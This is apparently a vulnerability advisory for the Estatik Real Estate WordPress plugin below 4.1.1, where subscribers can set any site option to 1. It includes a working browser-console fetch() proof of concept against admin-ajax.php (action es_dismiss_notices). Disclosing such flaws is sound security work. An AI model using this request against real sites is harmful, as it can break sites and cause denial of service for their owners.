Lucene search

K
wpexploitKrzysztof Zając (CERT PL)WPEX-ID:74CB07FE-FC82-472F-8C52-859C176D9E51
HistoryDec 25, 2023 - 12:00 a.m.

Estatik Real Estate Plugin < 4.1.1 - Subscriber+ Arbitrary Option Update

2023-12-2500:00:00
Krzysztof Zając (CERT PL)
47
estatik real estate plugin
subscriber
arbitrary option update
developer console
web browser
admin-ajax.php
exploit

6.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

13.5%

Description The plugin does not prevent user with low privileges on the site, like subscribers, from setting any of the site’s options to 1, which could be used to break sites and lead to DoS when certain options are reset

Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch("/wp-admin/admin-ajax.php?action=es_dismiss_notices", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "notice=template",
  "method": "POST",
});

6.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

13.5%

Related for WPEX-ID:74CB07FE-FC82-472F-8C52-859C176D9E51